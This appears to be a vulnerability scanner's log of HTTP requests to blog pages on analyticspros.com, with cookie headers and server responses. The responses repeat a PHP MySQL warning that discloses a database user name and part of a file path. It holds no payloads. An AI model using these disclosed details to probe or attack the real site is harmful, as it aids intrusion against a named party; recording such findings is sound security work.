GET /blog/55-googleanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:16:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:35:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/55-googleanalytics/106-google-analytics-health-check.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:44:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=30 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:57:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:56:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:51:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/56-seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:15:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:15:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:52 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/googleanalytics/113-domain-hostname-content-reports.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:46:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:39:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:54 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:11:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:06:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/googleanalytics/91-google-analytics-cookies-and-domains.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:47 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/googleanalytics/97-workshop-january-29th-dimensionator.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
